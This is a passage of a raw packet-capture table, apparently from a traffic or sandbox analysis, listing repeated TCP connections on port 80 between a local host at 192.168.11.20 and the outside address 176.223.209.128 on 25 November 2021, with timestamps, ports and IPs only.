Nov 25, 2021 10:53:11.628784895 CET	50439	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:11.663028955 CET	80	50439	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:12.015995026 CET	50440	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:12.050093889 CET	80	50440	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:12.050398111 CET	50440	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:12.051973104 CET	50440	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:12.086009979 CET	80	50440	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:12.086221933 CET	50440	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:12.120187044 CET	80	50440	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:12.136879921 CET	80	50440	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:12.136957884 CET	80	50440	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:12.137139082 CET	50440	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:12.137202978 CET	50440	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:12.171317101 CET	80	50440	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:12.532507896 CET	50441	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:12.565970898 CET	80	50441	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:12.566152096 CET	50441	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:12.567728996 CET	50441	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:12.601051092 CET	80	50441	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:12.601227045 CET	50441	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:12.634594917 CET	80	50441	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:12.651314974 CET	80	50441	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:12.651391029 CET	80	50441	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:12.651628971 CET	50441	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:12.651671886 CET	50441	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:12.685034037 CET	80	50441	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:12.978260040 CET	50442	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:13.012052059 CET	80	50442	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:13.012281895 CET	50442	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:13.013848066 CET	50442	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:13.047619104 CET	80	50442	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:13.047872066 CET	50442	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:13.081733942 CET	80	50442	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:13.102065086 CET	80	50442	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:13.102089882 CET	80	50442	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:13.102360010 CET	50442	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:13.102379084 CET	50442	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:13.136168003 CET	80	50442	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:13.408236027 CET	50443	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:13.441715002 CET	80	50443	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:13.441874981 CET	50443	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:13.443384886 CET	50443	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:13.476912022 CET	80	50443	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:13.477229118 CET	50443	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:13.510834932 CET	80	50443	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:13.528346062 CET	80	50443	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:13.528413057 CET	80	50443	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:13.528621912 CET	50443	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:13.528683901 CET	50443	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:13.562150955 CET	80	50443	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:13.914117098 CET	50444	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:13.948216915 CET	80	50444	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:13.948487997 CET	50444	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:13.950037956 CET	50444	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:13.984076977 CET	80	50444	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:13.984283924 CET	50444	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:14.018337011 CET	80	50444	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:14.034276009 CET	80	50444	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:14.034326077 CET	80	50444	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:14.034555912 CET	50444	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:14.068670034 CET	80	50444	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:14.426191092 CET	50445	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:14.459595919 CET	80	50445	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:14.459927082 CET	50445	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:14.461541891 CET	50445	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:14.494776011 CET	80	50445	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:14.494992971 CET	50445	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:14.528168917 CET	80	50445	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:14.544886112 CET	80	50445	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:14.544909954 CET	80	50445	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:14.545171022 CET	50445	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:14.545213938 CET	50445	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:14.578685999 CET	80	50445	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:14.928550959 CET	50446	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:14.961905956 CET	80	50446	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:14.962106943 CET	50446	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:14.963607073 CET	50446	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:14.996886015 CET	80	50446	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:14.997045040 CET	50446	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:15.030352116 CET	80	50446	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:15.049539089 CET	80	50446	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:15.049587011 CET	80	50446	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:15.049904108 CET	50446	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:15.049952984 CET	50446	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:15.083425045 CET	80	50446	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:15.424977064 CET	50447	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:15.459121943 CET	80	50447	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:15.459300995 CET	50447	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:15.460895061 CET	50447	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:15.494870901 CET	80	50447	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:15.495127916 CET	50447	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:15.529143095 CET	80	50447	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:15.545490980 CET	80	50447	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:15.545569897 CET	80	50447	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:15.545782089 CET	50447	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:15.545841932 CET	50447	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:15.579898119 CET	80	50447	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:15.935666084 CET	50448	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:15.969036102 CET	80	50448	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:15.969269991 CET	50448	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:15.970796108 CET	50448	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:16.004141092 CET	80	50448	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:16.004349947 CET	50448	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:16.037642956 CET	80	50448	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:16.055986881 CET	80	50448	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:16.056035995 CET	80	50448	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:16.056334972 CET	50448	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:16.056384087 CET	50448	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:16.089716911 CET	80	50448	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:16.407608986 CET	50449	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:16.441735029 CET	80	50449	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:16.442020893 CET	50449	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:16.443542957 CET	50449	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:16.477485895 CET	80	50449	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:16.477766037 CET	50449	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:16.511792898 CET	80	50449	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:16.527874947 CET	80	50449	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:16.527925968 CET	80	50449	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:16.528095007 CET	50449	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:16.528141975 CET	50449	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:16.562196016 CET	80	50449	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:16.911900997 CET	50450	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:16.945207119 CET	80	50450	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:16.945455074 CET	50450	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:16.946928024 CET	50450	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:16.980247021 CET	80	50450	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:16.980422020 CET	50450	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:17.013851881 CET	80	50450	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:17.030407906 CET	80	50450	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:17.030462980 CET	80	50450	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:17.030607939 CET	50450	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:17.030666113 CET	50450	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:17.064218044 CET	80	50450	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:17.425076008 CET	50451	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:17.459089994 CET	80	50451	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:17.459312916 CET	50451	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:17.460875988 CET	50451	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:17.494889021 CET	80	50451	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:17.495172024 CET	50451	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:17.529124022 CET	80	50451	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:17.544984102 CET	80	50451	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:17.545032978 CET	80	50451	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:17.545196056 CET	50451	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:17.545244932 CET	50451	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:17.579411030 CET	80	50451	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:17.925724983 CET	50452	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:17.959781885 CET	80	50452	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:17.959959984 CET	50452	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:17.961555958 CET	50452	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:17.995572090 CET	80	50452	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:17.995796919 CET	50452	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:18.030004025 CET	80	50452	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:18.047055006 CET	80	50452	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:18.047108889 CET	80	50452	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:18.047451019 CET	50452	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:18.047547102 CET	50452	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:18.081971884 CET	80	50452	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:18.420958042 CET	50453	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:18.454066992 CET	80	50453	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:18.454263926 CET	50453	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:18.455843925 CET	50453	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:18.489033937 CET	80	50453	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:18.489264011 CET	50453	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:18.522368908 CET	80	50453	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:18.537883043 CET	80	50453	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:18.537890911 CET	80	50453	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:18.538130999 CET	50453	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:18.538146973 CET	50453	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:18.571294069 CET	80	50453	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:18.848479986 CET	50454	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:18.882369995 CET	80	50454	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:18.882615089 CET	50454	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:18.884130001 CET	50454	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:18.917953014 CET	80	50454	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:18.918242931 CET	50454	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:18.952141047 CET	80	50454	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:18.967533112 CET	80	50454	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:18.967583895 CET	80	50454	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:18.967818975 CET	50454	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:18.967884064 CET	50454	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:19.001892090 CET	80	50454	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:19.373292923 CET	50455	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:19.407381058 CET	80	50455	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:19.407660007 CET	50455	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:19.409172058 CET	50455	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:19.443141937 CET	80	50455	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:19.443325043 CET	50455	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:19.477344036 CET	80	50455	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:19.500919104 CET	80	50455	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:19.500961065 CET	80	50455	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:19.501113892 CET	50455	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:19.501166105 CET	50455	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:19.535355091 CET	80	50455	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:19.862709999 CET	50456	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:19.896187067 CET	80	50456	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:19.896518946 CET	50456	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:19.898077965 CET	50456	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:19.931476116 CET	80	50456	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:19.931642056 CET	50456	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:19.965056896 CET	80	50456	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:19.988430977 CET	80	50456	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:19.988480091 CET	80	50456	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:19.988600969 CET	50456	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:19.988636017 CET	50456	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:20.022249937 CET	80	50456	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:20.358814955 CET	50458	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:20.392173052 CET	80	50458	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:20.392473936 CET	50458	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:20.393989086 CET	50458	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:20.427289009 CET	80	50458	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:20.427464962 CET	50458	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:20.460726976 CET	80	50458	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:20.485553980 CET	80	50458	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:20.485603094 CET	80	50458	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:20.485800982 CET	50458	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:20.485856056 CET	50458	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:20.519267082 CET	80	50458	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:20.872245073 CET	50459	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:20.906455040 CET	80	50459	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:20.906709909 CET	50459	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:20.908344984 CET	50459	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:20.942765951 CET	80	50459	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:20.942959070 CET	50459	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:20.976942062 CET	80	50459	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:20.999043941 CET	80	50459	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:20.999099970 CET	80	50459	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:20.999385118 CET	50459	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:20.999468088 CET	50459	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:21.033628941 CET	80	50459	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:21.352771044 CET	50460	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:21.386199951 CET	80	50460	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:21.386393070 CET	50460	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:21.387957096 CET	50460	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:21.421330929 CET	80	50460	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:21.421602964 CET	50460	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:21.454977989 CET	80	50460	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:21.490827084 CET	80	50460	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:21.490875006 CET	80	50460	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:21.491137028 CET	50460	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:21.491173029 CET	50460	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:21.524569988 CET	80	50460	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:21.858695030 CET	50461	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:21.892807007 CET	80	50461	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:21.892977953 CET	50461	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:21.894494057 CET	50461	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:21.928455114 CET	80	50461	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:21.928659916 CET	50461	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:21.962687969 CET	80	50461	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:21.984409094 CET	80	50461	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:21.984461069 CET	80	50461	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:21.984668016 CET	50461	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:21.984720945 CET	50461	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:22.018953085 CET	80	50461	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:22.373152971 CET	50462	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:22.407234907 CET	80	50462	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:22.407454014 CET	50462	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:22.409034967 CET	50462	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:22.443053007 CET	80	50462	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:22.443284988 CET	50462	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:22.477385044 CET	80	50462	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:22.498653889 CET	80	50462	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:22.498703003 CET	80	50462	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:22.498863935 CET	50462	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:22.498975992 CET	50462	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:22.533042908 CET	80	50462	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:22.894097090 CET	50463	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:22.927503109 CET	80	50463	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:22.927753925 CET	50463	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:22.929209948 CET	50463	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:22.962527990 CET	80	50463	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:22.962769985 CET	50463	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:22.996321917 CET	80	50463	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:23.012940884 CET	80	50463	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:23.013039112 CET	80	50463	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:23.013242960 CET	50463	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:23.013319969 CET	50463	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:23.046744108 CET	80	50463	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:23.393338919 CET	50464	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:23.427369118 CET	80	50464	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:23.427532911 CET	50464	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:23.429111958 CET	50464	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:23.462968111 CET	80	50464	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:23.463131905 CET	50464	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:23.497023106 CET	80	50464	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:23.516483068 CET	80	50464	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:23.516506910 CET	80	50464	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:23.516700029 CET	50464	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:23.516746044 CET	50464	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:23.550715923 CET	80	50464	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:23.832775116 CET	50465	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:23.866138935 CET	80	50465	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:23.866461992 CET	50465	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:23.867976904 CET	50465	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:23.901451111 CET	80	50465	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:23.901633978 CET	50465	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:23.934997082 CET	80	50465	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:23.950930119 CET	80	50465	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:23.950983047 CET	80	50465	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:23.951201916 CET	50465	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:23.951253891 CET	50465	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:23.984539986 CET	80	50465	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:24.341289997 CET	50466	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:24.374874115 CET	80	50466	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:24.375032902 CET	50466	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:24.376610041 CET	50466	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:24.410021067 CET	80	50466	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:24.410288095 CET	50466	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:24.443794012 CET	80	50466	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:24.459855080 CET	80	50466	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:24.459954023 CET	80	50466	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:24.460192919 CET	50466	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:24.460247040 CET	50466	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:24.494363070 CET	80	50466	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:24.811712980 CET	50467	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:24.845762014 CET	80	50467	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:24.845978022 CET	50467	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:24.847520113 CET	50467	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:24.881468058 CET	80	50467	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:24.881690025 CET	50467	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:24.915779114 CET	80	50467	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:24.931727886 CET	80	50467	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:24.931782007 CET	80	50467	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:24.932133913 CET	50467	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:24.932216883 CET	50467	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:24.966403961 CET	80	50467	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:25.318824053 CET	50468	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:25.353022099 CET	80	50468	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:25.353426933 CET	50468	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:25.354969025 CET	50468	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:25.388824940 CET	80	50468	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:25.389082909 CET	50468	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:25.422517061 CET	80	50468	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:25.439336061 CET	80	50468	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:25.439384937 CET	80	50468	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:25.439533949 CET	50468	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:25.439584017 CET	50468	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:25.473112106 CET	80	50468	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:25.847018957 CET	50469	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:25.881124973 CET	80	50469	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:25.881344080 CET	50469	80	192.168.11.20	176.223.209.128
